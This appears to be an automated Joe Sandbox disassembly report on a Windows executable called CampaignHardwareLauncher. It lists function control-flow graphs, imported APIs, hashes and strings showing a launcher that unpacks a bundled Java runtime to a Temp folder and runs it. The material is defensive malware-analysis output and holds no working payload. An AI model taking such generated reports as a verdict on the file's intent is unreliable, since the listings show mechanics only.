                                                                                                                                                                                                                                                                                                                • String ID: " :%s$-Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;dd$-cla$-jar$-jar$Add classpath:%s$Resource %d:%s$org.develnext.jphp.ext.javafx.FXLauncher$sspa$th "$true
                                                                                                                                                                                                                                                                                                                • API String ID: 689643918-1455150590
                                                                                                                                                                                                                                                                                                                • Opcode ID: f3cc387d6fe282e7dd2616dd62daa608cb237d8618ec9fd67493d2c34684ebff
                                                                                                                                                                                                                                                                                                                • Instruction ID: 45e07854ae54010095be9281c7dcb4a820f195fbc1c947dc7b9175b2af9540e9
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f3cc387d6fe282e7dd2616dd62daa608cb237d8618ec9fd67493d2c34684ebff
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE1261B09087018BD710AF29C54065BBBE5EF94304F0589BFE8C9AB391D77D8995CF8A
                                                                                                                                                                                                                                                                                                                Function 00403D20 Relevance: 44.0, APIs: 18, Strings: 7, Instructions: 207stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 393 403d20-403d7d call 406c70 memset FindResourceExA 396 403e91-403ea9 SetLastError 393->396 397 403d83-403d9a LoadResource 393->397 398 403eb0-403eb9 396->398 397->398 399 403da0-403daf LockResource 397->399 399->398 400 403db5-403db9 399->400 401 403dc0-403dca 400->401 401->401 402 403dcc-403dd4 401->402 403 403de3-403e1e memset call 403100 402->403 404 403dd6-403ddd 402->404 408 403fc4-403fd4 fprintf 403->408 409 403e24-403e2b 403->409 404->403 406 403fde-403ffc fprintf 404->406 406->403 408->406 410 403e3a-403e45 strcpy 409->410 411 403e2d-403e34 409->411 413 403e4a-403e51 call 402690 410->413 411->410 412 403f77-403fa1 strncpy strlen 411->412 415 403fa3-403fa8 412->415 416 403faf-403fbf strcat 412->416 417 403e56-403e58 413->417 415->416 416->413 417->398 418 403e5a-403e62 417->418 419 403e64 418->419 420 403eba-403efb FindResourceExA 418->420 421 403e69-403e90 strcpy 419->421 422 404001-404017 SetLastError 420->422 423 403f01-403f18 LoadResource 420->423 424 403f50-403f6c 422->424 423->424 425 403f1a-403f29 LockResource 423->425 424->421 427 403f72 424->427 425->424 426 403f2b 425->426 428 403f2d-403f37 426->428 427->412 428->428 429 403f39-403f41 428->429 429->424 430 403f43-403f4a 429->430 430->424 431 40401c-40403a fprintf 430->431 431->424
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00403D50
                                                                                                                                                                                                                                                                                                                • FindResourceExA.KERNEL32(00000003,00412360,?), ref: 00403D73
                                                                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,?,?,00404A72), ref: 00403D90
                                                                                                                                                                                                                                                                                                                • LockResource.KERNEL32(?,?,?,?,?,00404A72), ref: 00403DA3
                                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00403DFB
                                                                                                                                                                                                                                                                                                                • strcpy.MSVCRT ref: 00403E45
                                                                                                                                                                                                                                                                                                                • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00404A72), ref: 00403E7F
                                                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00404A72), ref: 00403E98
                                                                                                                                                                                                                                                                                                                • FindResourceExA.KERNEL32 ref: 00403EF1
                                                                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00404A72), ref: 00403F0E
                                                                                                                                                                                                                                                                                                                • LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00404A72), ref: 00403F1D
                                                                                                                                                                                                                                                                                                                • strncpy.MSVCRT ref: 00403F89
                                                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 00403F95
                                                                                                                                                                                                                                                                                                                • strcat.MSVCRT ref: 00403FBA
                                                                                                                                                                                                                                                                                                                • fprintf.MSVCRT ref: 00403FD4
                                                                                                                                                                                                                                                                                                                • fprintf.MSVCRT ref: 00403FF7
                                                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00404A72), ref: 00404008
                                                                                                                                                                                                                                                                                                                • fprintf.MSVCRT ref: 00404035
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$fprintf$ErrorFindLastLoadLockmemsetstrcpy$strcatstrlenstrncpy
                                                                                                                                                                                                                                                                                                                • String ID: :$Bundled JRE:%s$C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657$C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe$Resource %d:%s$\$true
                                                                                                                                                                                                                                                                                                                • API String ID: 1825146110-431872401
                                                                                                                                                                                                                                                                                                                • Opcode ID: b93b39cbe82f5e2f208a7984e44e89cdccab112937a32fab5cc704911dd864f8
                                                                                                                                                                                                                                                                                                                • Instruction ID: a351f2335a7c1ffd526f9bc51b8a145b2b5fd6ff43207c8f2e401759d570546c
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b93b39cbe82f5e2f208a7984e44e89cdccab112937a32fab5cc704911dd864f8
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 178160B09083019BD710AF29D54035ABFE9EF84344F05C87FE989AB3D1DB7C99558B8A
                                                                                                                                                                                                                                                                                                                Function 00403790 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 171stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 432 403790-4037cc FindResourceExA 433 4037d2-4037e9 LoadResource 432->433 434 4039b4-4039c6 SetLastError 432->434 435 40383a-40389f memset strlen strncpy strlen _open 433->435 436 4037eb-4037fa LockResource 433->436 437 4039ce-4039ec fprintf 434->437 438 4038a5-4038ac 435->438 439 403976-40397d 435->439 436->435 440 4037fc-4037fe 436->440 441 403826-403834 strlen 437->441 442 4038b2-4038f4 strlen _read 438->442 443 40399a-4039af fprintf 438->443 444 403800-40380d 440->444 441->435 445 403944-40394f 442->445 446 4038f6-4038f9 442->446 443->442 444->444 447 40380f-403817 444->447 448 403951-403955 445->448 449 403968-403971 _close 445->449 450 403900-403906 446->450 447->441 451 403819-403820 447->451 448->449 452 403957-403962 strlen 448->452 449->439 453 403990-403998 450->453 454 40390c-40391c 450->454 451->437 451->441 452->449 457 403940-403942 453->457 455 403980-403988 454->455 456 40391e-40392c 454->456 455->457 459 40398a-40398c 455->459 456->457 458 40392e-403932 456->458 457->445 457->450 458->457 460 403934 458->460 461 403937-403939 459->461 460->461 461->457
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: strlen$Resource$ErrorFindLastLoadLock_close_open_readmemsetstrncpy
                                                                                                                                                                                                                                                                                                                • String ID: Loading:%s$Resource %d:%s$ini
                                                                                                                                                                                                                                                                                                                • API String ID: 3498103655-913749543
                                                                                                                                                                                                                                                                                                                • Opcode ID: 1aeefc6938f78fb95fdeba6918e8ca31fde1e41f92e779772340ee2ce77c709b
                                                                                                                                                                                                                                                                                                                • Instruction ID: ffe5270cda513766b45dd1113f6f5d5a6076afea4e1b231d249c2800047aef03
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1aeefc6938f78fb95fdeba6918e8ca31fde1e41f92e779772340ee2ce77c709b
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E6181B59083118BDB10AF29C58035EBFE5AF44344F05847FE9C9A7382D7789A51CB8A
                                                                                                                                                                                                                                                                                                                Function 00406860 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 105stringprocesssynchronizationCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040689C
                                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 004068BD
                                                                                                                                                                                                                                                                                                                • strcat.MSVCRT ref: 004068DA
                                                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 004068E2
                                                                                                                                                                                                                                                                                                                • strcat.MSVCRT ref: 004068FE
                                                                                                                                                                                                                                                                                                                • CreateProcessA.KERNEL32 ref: 00406941
                                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,?,?,?,?,0040A01C,00000001,00000000,?,0040151F), ref: 00406994
                                                                                                                                                                                                                                                                                                                • GetExitCodeProcess.KERNEL32 ref: 004069AC
                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,0040A01C,00000001,00000000,?,0040151F), ref: 004069BD
                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,0040A01C,00000001,00000000,?,0040151F), ref: 004069CE
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe, xrefs: 004068C7
                                                                                                                                                                                                                                                                                                                • D, xrefs: 004068A1
                                                                                                                                                                                                                                                                                                                • -Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;dd, xrefs: 004068F2
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CloseHandleProcessmemsetstrcat$CodeCreateExitObjectSingleWaitstrlen
                                                                                                                                                                                                                                                                                                                • String ID: -Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;dd$C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe$D
                                                                                                                                                                                                                                                                                                                • API String ID: 196992964-281723408
                                                                                                                                                                                                                                                                                                                • Opcode ID: 925ee4bed1523179cba05dbda226f6a8605d2966789c7c8ca7956b0a3c785639
                                                                                                                                                                                                                                                                                                                • Instruction ID: c9cdd45e2a5c81e006214db6be6d40eb90bac674d27234413dd11b55ebfa4603
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 925ee4bed1523179cba05dbda226f6a8605d2966789c7c8ca7956b0a3c785639
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF4129B19083009BD700EF69D58064EFBF0FF84310F02897EE599AB391D7789965CB8A
                                                                                                                                                                                                                                                                                                                Function 00402690 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 73stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 470 402690-4026c7 memset 471 402708-40271c strcpy 470->471 472 4026c9-4026d0 470->472 475 402776-402783 strlen 471->475 476 40271e-40272b strlen 471->476 473 4026d2-4026d9 472->473 474 4026f9-402707 472->474 477 4026e0-4026f4 fprintf 473->477 478 4026db 473->478 481 402785 475->481 482 40278b-402794 475->482 479 402733-402738 476->479 480 40272d 476->480 477->474 478->477 483 40273c-40275c strcat _stat 479->483 480->479 481->482 482->483 483->472 484 402762-402771 SetLastError 483->484 484->472
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: strlen$ErrorLast_statfprintfmemsetstrcatstrcpy
                                                                                                                                                                                                                                                                                                                • String ID: (OK)$(not found)$Check launcher:%s %s$bin\java.exe$bin\javaw.exe
                                                                                                                                                                                                                                                                                                                • API String ID: 1479257852-1030199565
                                                                                                                                                                                                                                                                                                                • Opcode ID: 045868294d0a7ed06c315ae385c8820c2325015fc6260560a2149f7d46a293a6
                                                                                                                                                                                                                                                                                                                • Instruction ID: e8944f1a8106916e4475c21f7cef91e4a366f81d5ed1b62317d4ded5b41b0450
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 045868294d0a7ed06c315ae385c8820c2325015fc6260560a2149f7d46a293a6
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A63191B4908705DFD710AF65C58421EBBE0AF44304F16887FE888BB3D1D7B88941CB8A
                                                                                                                                                                                                                                                                                                                Function 004013E9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 128windowstringtimeCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 485 4013e9-401400 call 4021a0 489 401402-401415 strstr 485->489 490 40141b-401436 call 4021a0 485->490 489->490 491 40180d-401812 489->491 494 4015e9-4015f7 call 4021a0 490->494 495 40143c 490->495 491->490 497 401441-40144e 494->497 504 4015fd-401610 strstr 494->504 495->497 498 401450-401452 497->498 499 401458-4014c6 CreateWindowExA 497->499 498->499 501 4017e6-4017e8 498->501 502 40161b-401644 call 4020c0 499->502 503 4014cc-4014d4 499->503 506 4014d6-401504 SetTimer 501->506 509 4017ee 501->509 514 401646-401657 atoi 502->514 515 401668-401688 call 4021a0 502->515 503->506 507 40150a-401521 call 406860 503->507 504->497 508 401616 504->508 506->507 511 4013d5-4013da call 401ed0 506->511 507->511 523 401527-40152f 507->523 508->502 513 4017f3-4017fa 509->513 529 4013df-4013e6 511->529 518 401837-401859 fwrite 513->518 519 4017fc-401808 call 406830 call 401c10 513->519 520 40165d-401662 514->520 521 40193f-401944 514->521 531 4016a3-4016ee call 4021a0 LoadImageA 515->531 532 40168a-40169d strstr 515->532 518->519 519->529 520->515 521->515 527 401531-401539 523->527 528 40153f-401545 523->528 527->513 527->528 533 40155d-40157c GetMessageA 528->533 531->511 544 4016f4-4017de SendMessageA GetWindowRect GetSystemMetrics * 2 SetWindowPos ShowWindow UpdateWindow 531->544 532->531 535 401949-40194e 532->535 537 401547-40155a TranslateMessage DispatchMessageA 533->537 538 40157e-401586 533->538 535->531 537->533 541 4015b0-4015bc call 406830 538->541 542 401588-40158f 538->542 549 4015cc-4015d4 541->549 550 4015be-4015c6 541->550 542->541 545 401591-401599 542->545 547 4017e1 544->547 545->541 548 40159b-4015ab fprintf 545->548 547->501 548->541 551 401817-40182d fprintf 549->551 552 4015da-4015e4 call 401c10 549->552 550->547 550->549 551->518 552->529
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004021A0: FindResourceExA.KERNEL32 ref: 004021DD
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004021A0: LoadResource.KERNEL32 ref: 004021FA
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004021A0: LockResource.KERNEL32 ref: 00402209
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004021A0: fprintf.MSVCRT ref: 00402253
                                                                                                                                                                                                                                                                                                                • strstr.MSVCRT ref: 0040140E
                                                                                                                                                                                                                                                                                                                • CreateWindowExA.USER32 ref: 004014B1
                                                                                                                                                                                                                                                                                                                • SetTimer.USER32 ref: 004014FA
                                                                                                                                                                                                                                                                                                                • TranslateMessage.USER32 ref: 0040154A
                                                                                                                                                                                                                                                                                                                • DispatchMessageA.USER32 ref: 00401555
                                                                                                                                                                                                                                                                                                                • GetMessageA.USER32 ref: 00401572
                                                                                                                                                                                                                                                                                                                • fprintf.MSVCRT ref: 004015AB
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MessageResource$fprintf$CreateDispatchFindLoadLockTimerTranslateWindowstrstr
                                                                                                                                                                                                                                                                                                                • String ID: --l4j-no-splash$Exit code:%d, restarting the application!$STATIC
                                                                                                                                                                                                                                                                                                                • API String ID: 2241055113-1185063601
                                                                                                                                                                                                                                                                                                                • Opcode ID: 33ac18716a739c8569af302160795fed5acb0a4af97f80bbe930cd5371412de7
                                                                                                                                                                                                                                                                                                                • Instruction ID: 67a90b80666c473e9742fa792ab923d60fcf46590e4eeb89ab99995b83f5f157
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33ac18716a739c8569af302160795fed5acb0a4af97f80bbe930cd5371412de7
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F514B71A043058BD714DF2AD94035BB7F1ABC4300F15C83FE989AB3A0EB39C8519B8A
                                                                                                                                                                                                                                                                                                                Function 0040124A Relevance: 10.5, APIs: 7, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: _setmode$ExitProcess__p__environ__p__fmode_cexit
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2747451157-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 55b44065cfc3671dcbda3173ad3e590a602a7e1e9e535e6ec2c50fd80800269a
                                                                                                                                                                                                                                                                                                                • Instruction ID: 6dd9965de3e649a4df042f89f412d9c8f3f420679e1b57de8b71a4d36494cbca
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55b44065cfc3671dcbda3173ad3e590a602a7e1e9e535e6ec2c50fd80800269a
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD1109746057108FC304FF25D9C181A77B1BF88304B12CA7EE986AB3A6C738D850DB4A
                                                                                                                                                                                                                                                                                                                Function 00406A10 Relevance: 4.6, APIs: 3, Instructions: 95COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 580 406a10-406a40 call 406c70 call 406c00 GetCommandLineA GetStartupInfoA 585 406a42 580->585 586 406a48-406a5b 580->586 587 406ae6-406afe GetModuleHandleA 585->587 588 406a47 586->588 589 406a5d-406a60 586->589 590 406b00 587->590 591 406b04-406b21 call 4013b0 587->591 588->586 592 406aa0-406ab3 589->592 593 406a62-406a72 589->593 590->591 592->592 597 406ab5-406ab8 592->597 595 406ac0-406acc 593->595 596 406a74-406a7a 593->596 602 406ae0-406ae4 595->602 599 406a80-406a82 596->599 600 406b22-406b26 597->600 601 406aba 597->601 599->595 604 406a84-406a98 599->604 600->595 601->595 602->587 603 406ad0-406add 602->603 603->602 604->599 605 406a9a 604->605 605->595
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CommandHandleInfoLineModuleStartup
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 1628297973-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 426b7e169bc4001adf4ac2880b2c14a6d5950ebf415b9d4ab6f3d543cdd5321b
                                                                                                                                                                                                                                                                                                                • Instruction ID: ebf8bf4e4e20132a1a66f6807e23304a966a01df456f573df18988500c29227c
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 426b7e169bc4001adf4ac2880b2c14a6d5950ebf415b9d4ab6f3d543cdd5321b
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00215CB67047154FEB147636C4A23AB7BE26F42344F8AC03BC583321C3D23C5AB59A06
                                                                                                                                                                                                                                                                                                                Function 00406A9C Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 606 406a9c 607 406aa0-406ab3 606->607 607->607 608 406ab5-406ab8 607->608 609 406b22-406b26 608->609 610 406aba 608->610 611 406ac0-406acc 609->611 610->611 612 406ae0-406ae4 611->612 613 406ad0-406add 612->613 614 406ae6-406afe GetModuleHandleA 612->614 613->612 615 406b00 614->615 616 406b04-406b21 call 4013b0 614->616 615->616
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
